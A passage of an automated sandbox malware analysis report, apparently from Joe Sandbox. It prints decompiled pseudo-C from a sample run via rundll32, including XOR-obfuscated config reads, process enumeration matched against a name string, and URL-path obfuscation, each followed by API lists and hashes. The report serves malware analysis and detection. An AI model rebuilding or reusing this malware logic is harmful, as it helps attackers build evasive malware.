                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: bc0c8b3862fe4497d4a15a72abb08b6aebb9fe602092c0dc2dbcb42ba8ad0f07
                                • Instruction ID: 3712ef8956b5930e4fbcf14dc6b9950760b68ee43decdc0aefb684f68f30b0bf
                                • Opcode Fuzzy Hash: bc0c8b3862fe4497d4a15a72abb08b6aebb9fe602092c0dc2dbcb42ba8ad0f07
                                • Instruction Fuzzy Hash: A551B135611609EFDB01DFA8D844AAEB3B6FF88750B14842CE505EB290DB71FD56CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E042829ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v92;
                                				void _v236;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E04288B37(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E04284AA4(_t79,  &_v236);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04282F01(_t101,  &_v236, _a8, _t96 - _t81);
                                					E04282F01(_t79,  &_v92, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                					_t66 = E04284AA4(_t101, 0x428d1b0);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E04284AA4(_a16, _a4);
                                						E042828BA(_t79,  &_v236, _a4, _t97);
                                						memset( &_v236, 0, 0x8c);
                                						_t55 = memset( &_v92, 0, 0x44);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L0428AF6E();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L0428AF68();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0xe8;
                                						_a12 = _t74;
                                						_t76 = E04289947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v92;
                                							if(E04284506(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E0428A708(_t79,  &_v92, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0x428d1b0 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04282A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04282AB0
                                • memset.NTDLL ref: 04282B50
                                • memset.NTDLL ref: 04282B60
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: dc0cc056235568c0598edaac0a7bcafe62cc4c775a9823c7ff256e18c637e56c
                                • Instruction ID: 7ef4249fee4bb0949fb325847aa2407291bbebf99c40519964972b85b8de9dba
                                • Opcode Fuzzy Hash: dc0cc056235568c0598edaac0a7bcafe62cc4c775a9823c7ff256e18c637e56c
                                • Instruction Fuzzy Hash: 73416F71B2120AEBEB20FFA8CC40BAE7765EF54714F10856DB915AB1C0EB71B954CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E04286150(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				short* _t19;
                                				void* _t25;
                                				signed int* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				intOrPtr* _t32;
                                
                                				_t6 =  *0x428d270; // 0xd448b889
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0x109a6410;
                                				_t8 =  *0x428d2a8; // 0xaea5a8
                                				_t3 = _t8 + 0x428e87e; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E042810B1(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x428d2ac, 1, 0, _t30);
                                					E04288B22(_t30);
                                				}
                                				_t12 =  *0x428d25c; // 0x4000000a
                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04288F1B() != 0) {
                                					L12:
                                					_t28 = _a8;
                                					if(_t28 != 0) {
                                						 *_t28 =  *_t28 | 0x00000001;
                                					}
                                					_t31 = E04283485(_t32, 0);
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t28 != 0 && _t31 != 0) {
                                						 *_t28 =  *_t28 & 0xfffffffe;
                                					}
                                					goto L20;
                                				} else {
                                					_t19 =  *0x428d10c( *_t32, 0x20);
                                					if(_t19 != 0) {
                                						 *_t19 = 0;
                                						_t19 = _t19 + 2;
                                					}
                                					_t31 = E04288B7B(0,  *_t32, _t19, 0);
                                					if(_t31 == 0) {
                                						if(_t25 == 0) {
                                							L22:
                                							return _t31;
                                						}
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                						if(_t31 == 0) {
                                							L20:
                                							if(_t25 != 0) {
                                								CloseHandle(_t25);
                                							}
                                							goto L22;
                                						}
                                					}
                                					goto L12;
                                				}
                                			}


                                APIs
                                  • Part of subcall function 042810B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04D79D18,00000000,?,?,69B25F44,00000005,0428D00C,?,?,042830FE), ref: 042810E7
                                  • Part of subcall function 042810B1: lstrcpy.KERNEL32(00000000,00000000), ref: 0428110B
                                  • Part of subcall function 042810B1: lstrcat.KERNEL32(00000000,00000000), ref: 04281113
                                • CreateEventA.KERNEL32(0428D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0428991F,?,00000001,?), ref: 04286191
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,0428991F,00000000,00000000,?,00000000,?,0428991F,?,00000001,?,?,?,?,04287D37), ref: 042861F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,0428991F,?,00000001,?), ref: 0428621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,0428991F,?,00000001,?,?,?,?,04287D37), ref: 04286237
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: b8e47ffb36c39a9c4020b67d90068b5929d5e2ffd8cb0851f58f5676fda5a3fb
                                • Instruction ID: b2f1886387c8829db95b7a4c2d44dd52db439093cdf6c40154ac0f02cde20333
                                • Opcode Fuzzy Hash: b8e47ffb36c39a9c4020b67d90068b5929d5e2ffd8cb0851f58f5676fda5a3fb
                                • Instruction Fuzzy Hash: 7721E4327233125BD7217E68AC48A6F7399EB88B55F19062DF945D72CADF34EC018650
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E04289870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t38 = E04282931(__ecx,  &_v32);
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t16 =  &(_t39[1]); // 0x5
                                						_t23 = _t16;
                                						if( *_t16 != 0) {
                                							E04288DAB(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				if(E0428155A(0x40,  &_v16) != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x428d2ac, 1, 0,  *0x428d344);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8);
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E04285BC0(_t36);
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E04284B2A(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E04284FF0(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E04286150( &_v32, _t39);
                                					goto L13;
                                				}
                                			}


                                APIs
                                • CreateEventA.KERNEL32(0428D2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,04287D37,?,00000001,?), ref: 042898C1
                                • SetEvent.KERNEL32(00000000,?,?,?,04287D37,?,00000001,?,00000002,?,?,0428312C,?), ref: 042898CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,04287D37,?,00000001,?,00000002,?,?,0428312C,?), ref: 042898D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,04287D37,?,00000001,?,00000002,?,?,0428312C,?), ref: 042898E0
                                  • Part of subcall function 04285BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,04289900,?,04289900,?,?,?,?,?,04289900,?), ref: 04285C9A
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: 178daf3cafd9a3df1ff1a1a4b4acb763732d14221b90af685bf1daf9ea9042a5
                                • Instruction ID: adfeb7d88761494849c9ba8b7e398c3705e6be5f1dcdc255c6a59a6d686ed678
                                • Opcode Fuzzy Hash: 178daf3cafd9a3df1ff1a1a4b4acb763732d14221b90af685bf1daf9ea9042a5
                                • Instruction Fuzzy Hash: 7E21CB73F1221AABDB107FE998849FE7378DF44354B04442DEA11A7180E774B9858BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E04285F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E04281525(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}


                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: b15f0cd278b57904a391ca44548938d9c7729724be7f562661ab16dbf8e07f2c
                                • Instruction ID: 3e8d42a1bfc90a264bffeff2c778464254a11b128e25285081258d28370c3ac3
                                • Opcode Fuzzy Hash: b15f0cd278b57904a391ca44548938d9c7729724be7f562661ab16dbf8e07f2c
                                • Instruction Fuzzy Hash: 13216275A0220AFFCB11EFA8D88899EBBB5FF49340B10416DE905D7240EB70EA44CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E0428A41C(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x428d238, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x428d250; // 0x82dfa935
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x428d250 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}


                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04287C20,00000000,?,?,04289DA0,?,04D795B0), ref: 0428A427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0428A43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04287C20,00000000,?,?,04289DA0,?,04D795B0), ref: 0428A483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 0428A4A4
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 72028f5d2aeb33f56763df4ac8e86c94dc673ac123a59d9e8f9d937bec00e593
                                • Instruction ID: e96ec6c43a6b3e0ca11f644d905c9bebbcd3ba8c06735a3c69009d862ffb9950
                                • Opcode Fuzzy Hash: 72028f5d2aeb33f56763df4ac8e86c94dc673ac123a59d9e8f9d937bec00e593
                                • Instruction Fuzzy Hash: AD110672B12115AFD7109A6DDC88D9EBBBEDBC4361B05027AF5049B181EB74AE04C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E04288F1B() {
                                				char _v264;
                                				void* _v300;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0x428d2a8; // 0xaea5a8
                                						_t2 = _t9 + 0x428ee34; // 0x73617661
                                						_push( &_v264);
                                						if( *0x428d0fc() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						CloseHandle(_t17);
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04288F2B
                                • Process32First.KERNEL32(00000000,?), ref: 04288F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 04288F6A
                                • CloseHandle.KERNEL32(00000000), ref: 04288F79
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 9ee3a8227f45d58d91d89330faaf044b0808f5da1d62e4b253beaf15b9e89190
                                • Instruction ID: 46daec41ecb51dc03694c2cc214681c93d80d71f354c7b9653b84528bc689d0c
                                • Opcode Fuzzy Hash: 9ee3a8227f45d58d91d89330faaf044b0808f5da1d62e4b253beaf15b9e89190
                                • Instruction Fuzzy Hash: C4F0FC313131246AE720B6269C08DEF726DDB95714F800159E905C3082FA64EA45C761
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04288C01(void* __esi) {
                                				struct _SECURITY_ATTRIBUTES* _v4;
                                				void* _t8;
                                				void* _t10;
                                
                                				_v4 = 0;
                                				memset(__esi, 0, 0x38);
                                				_t8 = CreateEventA(0, 1, 0, 0);
                                				 *(__esi + 0x1c) = _t8;
                                				if(_t8 != 0) {
                                					_t10 = CreateEventA(0, 1, 1, 0);
                                					 *(__esi + 0x20) = _t10;
                                					if(_t10 == 0) {
                                						CloseHandle( *(__esi + 0x1c));
                                					} else {
                                						_v4 = 1;
                                					}
                                				}
                                				return _v4;
                                			}

                                APIs
                                • memset.NTDLL ref: 04288C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04288C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04288C31
                                • CloseHandle.KERNEL32(?), ref: 04288C43
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: a0d3d0885ae14193b84a087642f8b6d9978d46d51babd95f28b92dda2d7d3e9a
                                • Instruction ID: a02547673a5d223073be06a69ab013d4ad39ce853cd6ed9c9ef489fb03dae0a1
                                • Opcode Fuzzy Hash: a0d3d0885ae14193b84a087642f8b6d9978d46d51babd95f28b92dda2d7d3e9a
                                • Instruction Fuzzy Hash: 23F0BEB1202308BFD3147F26DCC4C2FBBACEF51299B11892EF04282551D672BC488AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04284DB1() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x428d26c; // 0x2c4
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x428d2bc; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x428d26c; // 0x2c4
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x428d238; // 0x4980000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}

                                APIs
                                • SetEvent.KERNEL32(000002C4,00000001,04287F41), ref: 04284DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04284DCB
                                • CloseHandle.KERNEL32(000002C4), ref: 04284DEC
                                • HeapDestroy.KERNEL32(04980000), ref: 04284DFC
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: f7ecafeef3f66674b10b0bc5f51e64dbd1c69b23f3415c42137665bf68ae1e14
                                • Instruction ID: ae062675467100e7eed306c3b64ae00c190a536e9d3cbe540c0c3985e55355fc
                                • Opcode Fuzzy Hash: f7ecafeef3f66674b10b0bc5f51e64dbd1c69b23f3415c42137665bf68ae1e14
                                • Instruction Fuzzy Hash: 7BF0127572331397EA207A3EB94CF0E3A98EB047A1704461CB910D76C5EF68EC44D660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E04288CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E04281525(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E04281525(_t28);
                                					if(_t30 == 0) {
                                						E04288B22(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E0428A7C2(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E0428A7C2(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04289816,?,?,?,?,00000102,0428937B,?,?,00000000), ref: 04288D06
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                  • Part of subcall function 0428A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04288D34,00000000,00000001,00000001,?,?,04289816,?,?,?,?,00000102), ref: 0428A7D0
                                  • Part of subcall function 0428A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,04289816,?,?,?,?,00000102,0428937B,?,?,00000000,00000000), ref: 0428A7DA
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04289816,?,?,?,?,00000102,0428937B,?), ref: 04288D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04288D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04288D80
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: c60aa9715ecf730e22e8fe83ec59d980197e9c033cf62d7e7176c4c14112557f
                                • Instruction ID: 0cc836d0d241d64fc1c47648071756f930f8e6c84a443cced236f04e3a52f67a
